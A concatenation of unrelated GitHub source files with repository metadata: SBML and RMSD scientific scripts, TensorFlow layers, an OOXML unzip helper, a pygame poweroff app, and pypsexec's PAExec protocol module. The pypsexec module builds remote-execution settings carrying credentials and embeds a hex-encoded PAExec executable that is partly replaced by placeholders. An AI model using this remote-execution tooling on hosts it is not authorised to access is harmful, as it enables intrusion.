setGetTimeCourseSelectionList ('Set/Get Time Course Selection List')
setGetSteadyStateSelectionList ('Set/Get Steady State Selection List')
setGetFloatingSpeciesByIndex ('Set/Get Floating Species by Index')
setGetBoundarySpeciesByIndex ('Set/Get Boundary Species by Index')
setGetCompartmentByIndex ('Set/Get Compartment by Index')
setGetGlobalParameterByIndex ('Set/Get Global Parameter buy Index')
setGetBoundarySpeciesConcentrations ('Set/Get Boundary Species Concs')
setGetFloatingSpeciesConcentrations ('Set/Get Floating Species Concs')
setGetInitialFloatingSpeciesConcentrations ('Set/Get Initial Concs')
setGetReset ('Set/Get Reset Method')
# ------------------------------------------------------------------------
# List of tests
functions = {'[Compute Steady State]': myComputeSteadyState,
#[Set Steady State Selection List]': mySetSteadyStateSelectionList,
'[Conservation Laws]': setConservationLaw,
'[Species Concentrations]': checkSpeciesConcentrations,
'[Fluxes]': checkFluxes,
'[Full Jacobian]': checkFullJacobian,
'[Eigenvalue Matrix]': checkEigenvalueMatrix,
'[Individual Eigenvalues]': checkIndividualEigenvalues,
'[Stoichiometry Matrix]': checkStoichiometryMatrix,
'[Link Matrix]': checkLinkMatrix,
'[Unscaled Elasticity Matrix]': checkUnscaledElasticityMatrix,
'[Scaled Elasticity Matrix]': checkScaledElasticityMatrix,
'[Unscaled Concentration Control Matrix]': checkUnscaledConcentrationControlMatrix,
'[Unscaled Flux Control Matrix]': checkUnscaledFluxControlCoefficientMatrix,
'[Scaled Concentration Control Matrix]': checkScaledConcentrationControlMatrix,
'[Scaled Flux Control Matrix]': checkScaledFluxControlCoefficientMatrix,
'[Floating Species Ids]': checkGetFloatingSpeciesIds,
'[Boundary Species Ids]': checkGetBoundarySpeciesIds,
'[Global Parameter Ids]': checkGetGlobalParameterIds,
'[Compartment Ids]': checkGetCompartmentIds,
'[Reaction Ids]': checkReactionIds,
'[Species Initial Condition Ids]': checkFloatingSpeciesInitialConditionIds,
'[Get Eigenvalue Ids]': checkEigenValueIds,
'[Get Rates Of Change Ids]': checkGetRatesOfChangeIds,
'[Set Steady State Selection List]': checkSetSteadyStateSelectionList,
'[Get Steady State Selection List]': checkGetSteadyStateSelectionList,
'[Set Time Course Selection List]': checkSetTimeCourseSelectionList,
'[Get Time Course Selection List]': checkGetTimeCourseSelectionList,
# '[Compute Steady State Values]': checkComputeSteadyStateValues,
'[Floating Species Concentrations]': checkFloatingSpeciesConcentrations,
'[Boundary Species Concentrations]': checkBoundarySpeciesConcentrations,
'[Get Global Parameter Values]': checkGlobalParameterValues,
'[Get Initial Floating Species Concs]': checkInitalFloatingSpeciesConcentations,
'[Get Reaction Rates]': checkReactionRates,
# '[Get Reaction Rate By Index]': checkGetReactionRatesByIndex,
'[Number of Dependent Species]': checkNumberOfDependentSpecies,
'[Number of Independent Species]': checkNumberOfIndependentSpecies,
'[Get Initial Floating Species Concs]': checkInitialConditions,
# '[Get Rates Of Change]': checkGetRatesOfChange,
# '[Get Reaction Rates Ex]': checkGetReactionRatesEx,
# '[Get Rates of Change Ex]': checkGetRatesOfChangeEx,
# '[Get Rate of Change by Index]': checkRateRateOfChangeByIndex,
}
# -----------------------------------------------------------------------
# MAIN START ROUTINE
# -----------------------------------------------------------------------
def runTester (*args):
global fHandle
global sbmlStr
global JarnacStr
if len(args) >= 1:
testModel = args[0]
else:
testModel = defaultTestFilePath()
print "Starting Tester on ", testModel
fHandle = open (testModel, 'r')
sbmlStr = loadSBMLModelFromTestFile ()
JarnacStr = loadJarnacModelFromTestFile ()
print "\n", "Info:"+ "\n"
# Create a roadRunner instance
print "Create roadRunner Instance....."
rrInstance = roadrunner.RoadRunner()
#rrInstance.enableLogging()
info = rrInstance.getInfo()
print info
print
# Load any initialization actions
testId = jumpToNextTest()
if testId == '[INITIALIZATION]':
testId = jumpToNextTest ()
while testId != '[END_INITIALIZATION]':
if functions.has_key(testId):
func = functions[testId]
func (rrInstance, testId)
else:
print 'No initialization function found for ' + testId
testId = jumpToNextTest()
# Load the model into RoadRunner
if rrInstance.load(sbmlStr) == False:
print 'Failed to load model'
#print rrInstance.getLastError()
raise
# Now start the tests proper
testId = jumpToNextTest()
if testId == '[START_TESTS]':
testId = jumpToNextTest()
while testId != '[END_TESTS]':
if functions.has_key(testId):
func = functions[testId]
func(rrInstance, testId)
else:
#getFloatingSpeciesAmountRates
print string.ljust (testId, rpadding), 'NO TEST'
testId = jumpToNextTest()
else:
print 'No Tests found'
#
# scriptTests()
``` |
{
"source": "0uO/UNMT-SPR",
"score": 3
} |
#### File: t2tlight/utils/layer.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
from utils.common import infer_shape
def linear(input_data,
output_size,
bias=True,
dtype=None,
scope=None):
"""
output = input_data * W + b
"""
with tf.variable_scope(scope, default_name="linear"):
input_shape = infer_shape(input_data)
input_size = input_shape[-1]
output_shape = tf.concat([input_shape[:-1], [output_size]], axis=0)
W = tf.get_variable("W", shape=[input_size, output_size], dtype=dtype)
output = tf.matmul(tf.reshape(input_data, [-1, input_size]), W)
if bias:
bias = tf.get_variable("b", shape=[output_size], dtype=dtype)
output = output + bias
return tf.reshape(output, output_shape)
def layer_norm(input_data,
epsilon=1e-6,
dtype=None,
scope=None):
with tf.variable_scope(scope, default_name="layer_norm"):
input_size = infer_shape(input_data)[-1]
scale = tf.get_variable("scale", shape=[input_size],
initializer=tf.ones_initializer())
bias = tf.get_variable("bias", shape=[input_size],
initializer=tf.zeros_initializer)
mean = tf.reduce_mean(input_data, -1, True)
variance = tf.reduce_mean(tf.square(input_data - mean), -1, True)
input_norm = (input_data - mean) * tf.rsqrt(variance + epsilon)
output = input_norm * scale + bias
return output
def smoothed_softmax_cross_entropy(logits,
labels,
smoothing,
normalize):
if logits is None or labels is None:
raise ValueError("Both logits and labels must be provided")
with tf.name_scope("smoothed_softmax_cross_entropy",
values=[logits, labels]):
labels = tf.reshape(labels, [-1])
if smoothing is None or smoothing == 0.0:
ce = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=labels
)
return ce
# label smoothing
vocab_size = tf.shape(logits)[1]
n = tf.to_float(vocab_size - 1)
p = 1.0 - smoothing
q = smoothing / n
soft_targets = tf.one_hot(tf.cast(labels, tf.int32), depth=vocab_size,
on_value=p, off_value=q)
xentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits,
labels=soft_targets)
if normalize is False:
return xentropy
# Normalizing constant is the best cross-entropy value with soft targets.
# We subtract it just for readability, makes no difference on learning
normalizing = -(p * tf.log(p) + n * q * tf.log(q + 1e-20))
return xentropy - normalizing
def residual_fn(previous_data,
input_data,
dropout_rate=None):
if dropout_rate is not None and dropout_rate > 0.0:
input_data = tf.nn.dropout(input_data, 1 - dropout_rate)
return previous_data + input_data
``` |
{
"source": "0ut0fcontrol/isoRMSD",
"score": 3
} |
#### File: 0ut0fcontrol/isoRMSD/isoRMSD.py
```python
import os
from os.path import split
import sys
import math
from numpy.lib.shape_base import column_stack
# rdkit imports
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem.AllChem import AlignMol
def GetBestRMSD(probe, ref, refConfId=-1, probeConfId=-1, maps=None, align=True):
"""Returns the optimal RMS for aligning two molecules, taking
symmetry into account. As a side-effect, the probe molecule is
left in the aligned state.
Arguments:
- ref: the reference molecule
- probe: the molecule to be aligned to the reference
- refConfId: (optional) reference conformation to use
- probeConfId: (optional) probe conformation to use
- maps: (optional) a list of lists of (probeAtomId,refAtomId)
tuples with the atom-atom mappings of the two molecules.
If not provided, these will be generated using a substructure
search.
Note:
This function will attempt to align all permutations of matching atom
orders in both molecules, for some molecules it will lead to 'combinatorial
explosion' especially if hydrogens are present.
Use 'rdkit.Chem.AllChem.AlignMol' to align molecules without changing the
atom order.
"""
# When mapping the coordinate of probe will changed!!!
ref.pos = orginXYZ(ref)
probe.pos = orginXYZ(probe)
try:
name = probe.GetProp("_Name")
except KeyError as e:
name = "NaN"
if not maps:
matches = ref.GetSubstructMatches(probe, uniquify=False)
if not matches:
raise ValueError(
"mol %s does not match mol %s"
% (ref.GetProp("_Name"), probe.GetProp("_Name"))
)
if len(matches) > 1e6:
print(
"{} matches detected for molecule {}, this may lead to a performance slowdown.".format(
len(matches), name
)
)
maps = [list(enumerate(match)) for match in matches]
bestRMSD = 10000.0
for amap in maps:
if align:
rmsd = AlignMol(probe, ref, probeConfId, refConfId, atomMap=amap)
else:
rmsd = RMSD_NotAlign(probe, ref, amap)
bestRMSD = min(bestRMSD, rmsd)
return bestRMSD
# Map is probe -> ref
# [(1:3),(2:5),...,(10,1)]
def RMSD_NotAlign(probe, ref, amap):
rmsd = 0.0
# print(amap)
atomNum = ref.GetNumAtoms() + 0.0
for (pi, ri) in amap:
posp = probe.pos[pi]
posf = ref.pos[ri]
rmsd += dist_2(posp, posf)
rmsd = math.sqrt(rmsd / atomNum)
return rmsd
def dist_2(atoma_xyz, atomb_xyz):
dis2 = 0.0
for i, j in zip(atoma_xyz, atomb_xyz):
dis2 += (i - j) ** 2
return dis2
def orginXYZ(mol):
mol_pos = {}
for i in range(0, mol.GetNumAtoms()):
pos = mol.GetConformer().GetAtomPosition(i)
mol_pos[i] = pos
return mol_pos
if __name__ == "__main__":
import argparse
import pandas as pd
from oddt.toolkits import rdk as toolkit
parser = argparse.ArgumentParser(__doc__)
parser.add_argument(
"-r",
"--reference",
required=True,
help="reference mol in .pdb, .mol2 or .sdf format",
)
parser.add_argument(
"-p", "--probe", required=True, help="probe mols in .pdb, .mol2, or .sdf"
)
parser.add_argument(
"-o",
"--output_csv",
default="rmsd.csv",
help="output rmsd in a csv file, default: rmsd.csv",
)
args = parser.parse_args()
ref_fmt = args.reference.split(".")[-1]
ref_oddt = next(toolkit.readfile(ref_fmt, args.reference))
ref_rdk = Chem.RemoveHs(ref_oddt.Mol)
probe_fmt = args.probe.split(".")[-1]
probe_oddt_supp = toolkit.readfile(probe_fmt, args.probe)
column_names = ["Mol_Name", "RMSD_Align", "RMSD_NotAlign"]
print(column_names)
data = []
for i, probe_oddt in enumerate(probe_oddt_supp):
if probe_oddt is None:
name = "NaN"
rmsd_notalign = 10000.0
rmsd_align = 10000.0
else:
probe_rdk = Chem.RemoveHs(probe_oddt.Mol)
try:
name = probe_rdk.GetProp("_Name")
name = "_".join(name.split())
except KeyError as e:
name = "NaN"
print("\nAssign bond orders from probe to reference.")
# will raise warning("More than one matching pattern found - picking one")
ref = AllChem.AssignBondOrdersFromTemplate(probe_rdk, ref_rdk)
# order is matter because GetBestRMSD(align=True) will change probe mol.
rmsd_notalign = GetBestRMSD(probe_rdk, ref, align=False)
rmsd_align = GetBestRMSD(probe_rdk, ref, align=True)
print(f"mol{i:04d} {name} {rmsd_align} {rmsd_notalign}")
data.append((name, rmsd_align, rmsd_notalign))
df = pd.DataFrame(data, columns=column_names)
df.index.name = "index"
df.to_csv(args.output_csv)
print(f"\nresult save in {args.output_csv}")
``` |
{
"source": "0utDoorFr0g/OOXML_auto_analysis",
"score": 3
} |
#### File: 0utDoorFr0g/OOXML_auto_analysis/OOXML_auto_analysis.py
```python
import zipfile
import os
import shutil
class FileInfo:
def __init__(self, path):
self.target_file_path = path
self.unzip_file_path = ""
self.ooxml_file_flag = False
self.ooxml_file_type = "" # {xl | ppt | word}
self.temp_path = ""
if FileInfo.check_pk_zip_signature(self.target_file_path) == True:
self.temp_path = os.path.dirname(self.target_file_path) + "\\" + "temp"
os.makedirs(self.temp_path, exist_ok=True)
self.unzip_file_path = self.temp_path + "\\" + "sample" + os.path.basename(self.target_file_path)
os.mkdir(self.unzip_file_path)
if FileInfo.unzip_file(self.target_file_path, self.unzip_file_path):
if FileInfo.check_ooxml_file(self.unzip_file_path):
self.ooxml_file_flag = True
content_file = open(self.unzip_file_path + "\\" + "[Content_Types].xml","r")
content_data = content_file.read()
content_file.close()
if content_data.find("xl") != -1:
self.ooxml_file_type = "xl"
elif content_data.find("word") != -1:
self.ooxml_file_type = "word"
elif content_data.find("ppt") != -1:
self.ooxml_file_type = "ppt"
else:
self.ooxml_file_type = "another"
def delete_unzip_file(self):
""" delete unziped file package and directory
Args:
Return:
"""
shutil.rmtree(self.unzip_file_path)
@staticmethod
def check_pk_zip_signature(path):
""" check the file has PKZIP signature
Args:
path (string) : file path to check
Return:
bool : if file has PKZIP signature return True, else return False
None : if function raise exception return None
"""
try:
f = open(path,"rb")
file_data = f.read(4)
f.close()
if file_data != b"\x50\x4B\x03\x04":
return False
else:
return True
except:
return None
@staticmethod
def unzip_file(target_path, extract_path):
""" unzip target file to extract_path
Args:
target_path (string) : file path to unzip
extract_path (string) : unziped result will be placed this path
Return:
bool : if function succeed return True else return False
"""
try:
target_handle = zipfile.ZipFile(target_path)
target_handle.extractall(extract_path)
return True
except:
return False
@staticmethod
def check_ooxml_file(path):
""" check the file is OOXML file
Args:
path (string) : path to unziped file to check
Return:
bool : if file is OOXML file return True, else return False
"""
return os.path.isfile(path + "\\" + "[Content_Types].xml")
sample = [FileInfo("C:\\Users\\forgo\\Desktop\\testtt\\abcd" + str(i) + ".zip") for i in range(1,4)]
for i in sample:
print(i.ooxml_file_type)
i.delete_unzip_file()
shutil.rmtree(sample[0].temp_path)
``` |
{
"source": "0v3rl0w/didactic-rotary-phone",
"score": 3
} |
#### File: apps/shutdown/main.py
```python
import os
import pygame
from typing import Tuple
class Shutdown:
def __init__(self, size: Tuple[int, int]):
self.screen_res = size
def mainloop(self, event):
if os.environ["dev"] == "dev":
exit()
else:
os.system("poweroff")
def get_surface(self) -> pygame.Surface:
return pygame.Surface(self.screen_res)
def callObject(size: Tuple[int, int]) -> object:
return Shutdown(size)
``` |
{
"source": "0v3rride/pypsexec_mod",
"score": 2
} |
#### File: pypsexec_mod/pypsexec/paexec.py
```python
import binascii
import os
import struct
from smbprotocol.structure import BoolField, BytesField, EnumField, \
IntField, ListField, Structure, StructureField, DateTimeField
from pypsexec.exceptions import PAExecException
try:
from collections import OrderedDict
except ImportError: # pragma: no cover
from ordereddict import OrderedDict
def paexec_out_stream(buffer_size=4096):
"""
Creates a generator to read the PAExec executable data as a bytes stream.
:param buffer_size: The size of the buffer yielded
:return: (bytes, offset) = the butes and the offset of the bytes string
"""
payload_bytes = binascii.unhexlify(PAEXEC_DATA)
byte_count = len(payload_bytes)
for i in range(0, byte_count, buffer_size):
yield payload_bytes[i:i + buffer_size], i
def get_unique_id(pid, computer_name):
"""
https://github.com/poweradminllc/PAExec/blob/master/Remote.cpp#L1045-L1065
DWORD RemMsg::GetUniqueID()
Creates a unique ID based on the PID of the local host and the name of the
local host. It is derived from the first 4 bytes of a UTF-16 Little Endian
encoded computer name and the local PID xor'd together.
This value is sent in the PAExecSettingsMsg to define the process details
and also the PAExecResponseMsg to control the execution and results of
the processed based on the settings.
:param pid: (int) the process id of the current host
:param computer_name: (str/unicode) of the current hostname
:return: int of the unique ID derived from the PID and Computer Name
"""
bcomp_name = computer_name.encode('utf-16-le')[:4]
bcomp_name = bcomp_name + (b"\x00" * (4 - len(bcomp_name)))
return pid ^ struct.unpack("<L", bcomp_name)[0]
class PAExecMsgId(object):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L52-L57
The various ID's used by PAExec when sending messages to and from the
remote service.
"""
MSGID_SETTINGS = 1
MSGID_RESP_SEND_FILES = 2
MSGID_SENT_FILES = 3
MSGID_OK = 4
MSGID_START_APP = 5
MSGID_FAILED = 6
class ProcessPriority(object):
"""
https://msdn.microsoft.com/en-us/library/windows/desktop/ms683211(v=vs.85).aspx
Set's the priority of the thread in the current process
"""
ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000
BELOW_NORMAL_PRIORITY_CLASS = 0x00004000
HIGH_PRIORITY_CLASS = 0x00000080
IDLE_PRIORITY_CLASS = 0x00000040
NORMAL_PRIORITY_CLASS = 0x00000020
REALTIME_PRIORITY_CLASS = 0x00000100
class PAExecMsg(Structure):
"""
Generic message from PAExec, the first 2 bytes denotes the Msg ID
that tells the host the type of message it is and the buffer contents
varies based on the type of message that is being sent of received.
This is slightly different to the PAExecSettingsMsg as the data in the
settings msg is xor'd to slightly obfuscate the data. The current buffer
structures that have been defined are PAStartBuffer, PAReturnBuffer
"""
def __init__(self):
self.fields = OrderedDict([
('msg_id', EnumField(
size=2,
enum_type=PAExecMsgId
)),
('unique_id', IntField(size=4)),
('buffer_length', IntField(
size=4,
default=lambda s: len(s['buffer'])
)),
('buffer', BytesField(
size=lambda s: s['buffer_length'].get_value()
))
])
super(PAExecMsg, self).__init__()
def check_resp(self):
msg_id = self['msg_id'].get_value()
if msg_id != PAExecMsgId.MSGID_OK:
raise PAExecException(msg_id, self['buffer'].get_value())
class PAExecSettingsMsg(Structure):
"""
Custom PAExecMsg structure that contains the settings used by PAExec to
configure the remote process. The structure is different from the standard
PAExecMsg as the values past the msg_id is xor'd and the initial XOR value
is generated randomly and stored after the msg_id.
This does not encrypt the data but rather scrambles it so that someone
snooping on the network traffic isn't easily able to see the settings as it
can contain the credentials of a user. SMB encryption should really be used
in most cases if it is available as that actually encrypts the data.
The buffer value contains the PAExecSettingsBuffer type that contains all
the settings used by PAExec.
"""
def __init__(self):
self.fields = OrderedDict([
('msg_id', EnumField(
size=2,
default=PAExecMsgId.MSGID_SETTINGS,
enum_type=PAExecMsgId
)),
('xor_val', IntField(
size=4,
default=os.urandom(4)
)),
('unique_id', IntField(size=4)),
('buffer_len', IntField(size=4)),
('buffer', StructureField(
structure_type=PAExecSettingsBuffer
))
])
super(PAExecSettingsMsg, self).__init__()
def pack(self):
# need to xor the buffer as expected by PAExec
xor_value = self['xor_val'].get_value()
# the id, length and buffer itself is xor'd
input_data = self['unique_id'].pack() + self['buffer_len'].pack() + \
self['buffer'].pack()
buffer = self._xor_data(xor_value, input_data)
# build the final data structure
data = self['msg_id'].pack()
data += self['xor_val'].pack()
data += buffer
return data
def unpack(self, data):
# need to de-xor the buffer to get human readable values
xor_value = struct.unpack("<L", data[2:6])[0]
buffer = data[6:]
buffer_data = self._xor_data(xor_value, buffer)
unique_id = buffer_data[:4]
buffer_len = buffer_data[4:8]
structure_a = PAExecSettingsBuffer()
structure_a.unpack(buffer_data[8:])
self['msg_id'] = data[:2]
self['xor_val'] = data[2:6]
self['unique_id'] = unique_id
self['buffer_len'] = buffer_len
self['buffer'] = structure_a
return b""
def _xor_data(self, xor_value, data):
buffer = b""
next_bytes = data[:4]
for i in range(0, len(data) - 4):
int_value = struct.unpack("<L", next_bytes)[0]
xored_value = int_value ^ xor_value
new_bytes = struct.pack("<L", xored_value)
buffer += new_bytes[:1]
next_bytes = new_bytes[1:] + data[i + 4:i + 5]
xor_value += 3
int_value = struct.unpack("<L", next_bytes)[0]
xored_value = int_value ^ xor_value
new_bytes = struct.pack("<L", xored_value)
buffer += new_bytes
return buffer
class PAExecSettingsBuffer(Structure):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L132-L341
A PAExec buffer that contains the settings used by the remote PAExec
service to start a process. It contains a wide range of settings that can
be configured such as the remote user as well as the executable and
arguments used to start the process.
All BytesFields in this structure are utf-16-le encoded strings and should
be encoded before setting in the structure.
"""
def __init__(self):
self.fields = OrderedDict([
('version', IntField(
size=4,
default=1
)),
('num_processors', IntField(
size=4,
default=lambda s: len(s['processors'].get_value())
)),
('processors', ListField(
size=lambda s: s['num_processors'].get_value() * 4,
list_count=lambda s: s['num_processors'].get_value(),
list_type=IntField(size=4)
)),
('copy_files', BoolField(size=1)),
('force_copy', BoolField(size=1)),
('copy_if_newer_or_higher_ver', BoolField(size=1)),
('asynchronous', BoolField(size=1)),
('dont_load_profile', BoolField(size=1)),
('interactive_session', IntField(size=4)),
('interactive', BoolField(size=1)),
('run_elevated', BoolField(size=1)),
('run_limited', BoolField(size=1)),
('password_len', IntField(
size=4,
default=lambda s: int(len(s['password']) / 2)
)),
('password', BytesField(
size=lambda s: s['password_len'].get_value() * 2
)),
('username_len', IntField(
size=4,
default=lambda s: int(len(s['username']) / 2)
)),
('username', BytesField(
size=lambda s: s['username_len'].get_value() * 2
)),
('use_system_account', BoolField(size=1)),
('working_dir_len', IntField(
size=4,
default=lambda s: int(len(s['working_dir']) / 2)
)),
('working_dir', BytesField(
size=lambda s: s['working_dir_len'].get_value() * 2
)),
('show_ui_on_win_logon', BoolField(size=1)),
('priority', EnumField(
size=4,
default=ProcessPriority.NORMAL_PRIORITY_CLASS,
enum_type=ProcessPriority
)),
('executable_len', IntField(
size=4,
default=lambda s: int(len(s['executable']) / 2)
)),
('executable', BytesField(
size=lambda s: s['executable_len'].get_value() * 2
)),
('arguments_len', IntField(
size=4,
default=lambda s: int(len(s['arguments']) / 2)
)),
('arguments', BytesField(
size=lambda s: s['arguments_len'].get_value() * 2
)),
('disable_file_redirection', BoolField(size=1)),
('enable_debug', BoolField(size=1)),
('remote_log_path_len', IntField(
size=4,
default=lambda s: int(len(s['remote_log_path']) / 2)
)),
('remote_log_path', BytesField(
size=lambda s: s['remote_log_path_len'].get_value() * 2
)),
('no_delete', BoolField(size=1)),
('src_dir_len', IntField(
size=4,
default=lambda s: int(len(s['src_dir']) / 2)
)),
('src_dir', BytesField(
size=lambda s: s['src_dir_len'].get_value() * 2
)),
('dest_dir_len', IntField(
size=4,
default=lambda s: int(len(s['dest_dir']) / 2)
)),
('dest_dir', BytesField(
size=lambda s: s['dest_dir_len'].get_value() * 2
)),
('num_src_files', IntField(
size=4,
default=lambda s: len(s['src_files'].get_value())
)),
('src_files', ListField(
list_count=lambda s: s['num_src_files'].get_value(),
list_type=StructureField(structure_type=PAExecFileInfo),
unpack_func=lambda s, d:
self._unpack_file_list(s, d, 'num_src_files')
)),
('num_dest_files', IntField(
size=4,
default=lambda s: len(s['dest_files'].get_value())
)),
('dest_files', ListField(
list_count=lambda s: s['num_dest_files'].get_value(),
list_type=StructureField(structure_type=PAExecFileInfo),
unpack_func=lambda s, d:
self._unpack_file_list(s, d, 'num_dest_files')
)),
('timeout_seconds', IntField(size=4))
])
super(PAExecSettingsBuffer, self).__init__()
def _unpack_file_list(self, structure, data, len_field):
files = []
remaining_data = data
for i in range(0, structure[len_field].get_value()):
file_structure, remaining_data = self._get_file(remaining_data)
files.append(file_structure)
return files
def _get_file(self, data):
min_size = 21
filename_size = struct.unpack("<L", data[:4])[0]
structure_end_offset = min_size + (filename_size * 2)
file_structure_data = data[:structure_end_offset]
file_structure = PAExecFileInfo()
file_structure.unpack(file_structure_data)
return file_structure, data[structure_end_offset:]
class PAExecFileInfo(Structure):
"""
https://github.com/poweradminllc/PAExec/blob/master/stdafx.h#L59-L82
class FileInfo
Structure the contains information about a file to copy or move and is set
in PAExecSettingsBuffer. Like other PAExec messages, fields that take in a
string take in a utf-16-le encoded string as a bytes structure.
"""
def __init__(self):
self.fields = OrderedDict([
('filename_len', IntField(
size=4,
default=lambda s: int(len(s['filename']) / 2)
)),
('filename', BytesField(
size=lambda s: s['filename_len'].get_value() * 2
)),
('file_last_write', DateTimeField(size=8)),
('file_version_ls', IntField(size=4)),
('file_version_ms', IntField(size=4)),
('copy_file', BoolField(size=1))
])
super(PAExecFileInfo, self).__init__()
class PAExecStartBuffer(Structure):
"""
Can't find where this is explicitly defined but this is the buffer used in
the PAExecMsg to start a remote process. On receipt of this message, the
remote process will match the settings based on the unique_id passed in and
start the process based on those settings.
The comp_name is a utf-16-le encoded string of the local hostname and
should match the host used in the service name.
"""
def __init__(self):
self.fields = OrderedDict([
('process_id', IntField(size=4)),
('comp_name_length', IntField(
size=4,
default=lambda s: int(len(s['comp_name']) / 2)
)),
('comp_name', BytesField(
size=lambda s: s['comp_name_length'].get_value() * 2
))
])
super(PAExecStartBuffer, self).__init__()
class PAExecReturnBuffer(Structure):
"""
The buffer used in the PAExecMsg that is sent by the remote service on
completion of the remote process. It contains a single Int32 value that is
the return code of the process.
"""
def __init__(self):
self.fields = OrderedDict([
('return_code', IntField(size=4))
])
super(PAExecReturnBuffer, self).__init__()
# https://www.poweradmin.com/paexec/paexec.exe
# Hex string of the paexec executable as of v1.26, this is used when copying
# the executable from the current hos to the Windows host
PAEXEC_DATA = '4d5a90000300000004000000ffff0000b8000000000000004000000000000' \
'00000000000000000000000000000000000000000000000000000000000e8' \
'0000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d206' \
'3616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400' \
'000000000000bc6f8748f80ee91bf80ee91bf80ee91b09c8241bf60ee91b0' \
'9c8271b8a0ee91b09c8261bd60ee91bf1767a1beb0ee91bf80ee81b400ee9' \
'1b9ee03a1bf20ee91b9ee0201bf90ee91bf80e7e1bf90ee91b9ee0251bf90' \
'ee91b52696368f80ee91b0000000000000000504500004c010500a9dded54' \
'0000000000000000e00002010b010b00008c0100005c010000000000bce90' \
'0000010000000a00100000040000010000000020000050001000000000005' \
'00010000000000002003000004000088eb020003004081000010000010000' \
'0000010000010000000000000100000000000000000000000e4410200b400' \
'000000a00200c0240000000000000000000000cc0200b816000000d002007' \
'41d000010a301003800000000000000000000000000000000000000000000' \
'0000000000a825020040000000000000000000000000a00100a0020000000' \
'0000000000000000000000000000000000000000000002e74657874000000' \
'9d8a010000100000008c01000004000000000000000000000000000020000' \
'0602e7264617461000004b2000000a0010000b40000009001000000000000' \
'00000000000000400000402e6461746100000080310000006002000012000' \
'000440200000000000000000000000000400000c02e72737263000000c024' \
'000000a002000026000000560200000000000000000000000000400000402' \
'e72656c6f630000564f000000d0020000500000007c020000000000000000' \
'0000000000400000420000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'0000000000000000000000000000000000000000000000000000000000000' \
'000000000000000000000000000000000006a04b8238b4100e80ae300008b' \
'f18975f08d4e046800604200c706a8f84100e80d0f000033db895dfc895e0' \
'8895e0ce852080000894608885e108bc6e8b2e20000c20800558bec568bf1' \
'e826000000f6450801740756e8f9af0000598bc65e5dc20400568bf1e8560' \
'50000ff36e8e2af0000595ec356578bf98d77088bcec707a8f84100e83805' \
'00008bcee831050000ff36e8bdaf0000598b4f045f83e9105ee9b50e00006' \
'<KEY>' \
'04e8820400008d46088bc88945ece8ea04000068006042008d4ddce84d0e0' \
'<KEY>' \
'000068b8f8410053e8a5af00008bf0595985f60f840603000083c6028bce3' \
'3db8d5102668b0183c102663bc375f52bcad1f90f84e702000068acf84100' \
'<KEY>' \
'0000050895d08e870b000005985c074198bfb83c7020fb70750e85db00000' \
'<KEY>' \
'<KEY>' \
'8d4de8e822040000c645fc048b75e8837ef400745e8b45e080781000750b8' \
'd4de8e88e0300008b75e88d4ef0e8780c000083c0108945cc8d4ff0c645fc' \
'05e8660c00008d5810895dd08b4dec8d45cc508d45bc50c645fc06e87f030' \
'0008d4bf0e83d0d00008b4dcc8d49f0e8320d00008b5dd883c302e9df0000' \
'008bc32bc66800604200d1f850568d4de4e89a0300008b45e0c645fc07807' \
'8100075088d4de4e80f030000beb4f8410083c3025653e847ae000059593b' \
'c3750c83c3025653e837ae0000eb0a6a20585053e861af000059894508598' \
'<KEY>' \
'e8310300008d4ef0c645fc0be8a40b000083c0108945c4c645fc0c8b45d48' \
'3c0f08bc88945d8e88a0b00008d5810895dc88b4dec8d45c4508d45b450c6' \
'45fc0de8a30200008d4bf0e8610c00008b4dc48d49f0e8560c00008b4dd8e' \
'84e0c00008b45088d580233c08d4ef08845fce83b0c00008bcb33f68d5102' \
'668b0183c102663bc675f52bcad1f90f85c8fdffffe9e0000000538d4d08e' \
'8b7010000c645fc088b75e4837ef400744a8d4ef0e8030b000083c0108945' \
'c4c645fc098b4d088d49f0e8ee0a00008d5810895dc88b4dec8d45c4508d4' \
'<KEY>' \
'8b45088d48f0e8af0b00008d4ef0eb6b568d4d08e8470100008b45e0c645f' \
'c018078100075088d4d08e89e0100008b4d088d49f0e8880a00008d581089' \
'<KEY>' \
'0c645fc03e88f0100008d4ef0e84d0b00008d4bf0e8450b00008b45088d48' \
'f0e83a0b00008d4ff0e8320b000032c0e8c4de0000c20400568bf18b4e048' \
'3e910e81a0b00008b0e83e9105ee90f0b00006a04b8d18b4100e8bfde0000' \
'8bd9ff750c8d4d0ce89c0000008365fc00807b100075088d4d0ce8f600000' \
'<KEY>' \
'8b36807e0d0074e23b7b087414ff77108d4d0ce85202000085c07805897df' \
'<KEY>' \
'c6e81cde0000c20800558bec56ff75088d4508508bf1e85fffffff8b45083' \
'b46085e750433c0eb038b40145dc204006a04b8f3924100e80ade00008bf1' \
'8975f06800604200e8160a00008b45088365fc0085c07414a90000ffff750' \
'd0fb7c0508bcee84b010000eb08508bcee80a0000008bc6e8aadd0000c204' \
'00558bec568bf18b4d08e88602000050ff75088bcee8670800008bc65e5dc' \
'2040056578bf98b078b70f456e8ee0700008d56015250e873af0000595956' \
'<KEY>' \
'<KEY>' \
'06ff7004e8780000008b068940048b0689008b06894008836604005ec3558' \
'<KEY>' \
'eb378b016a0256ff1085c0743183c010568bcf8907e8850700008d043650f' \
'f750850ff37e86cac000083c4108bc75f5e5dc20c006805400080e8d90800' \
'<KEY>' \
'be8e3ffffff8b3f8d4e10e8c5fdffff56e8e1a90000807f0d00598bf774dd' \
'5f5e5b5dc20400558bec51535657894dfc6a00b9cc704200e884a7000033d' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
'<KEY>' \
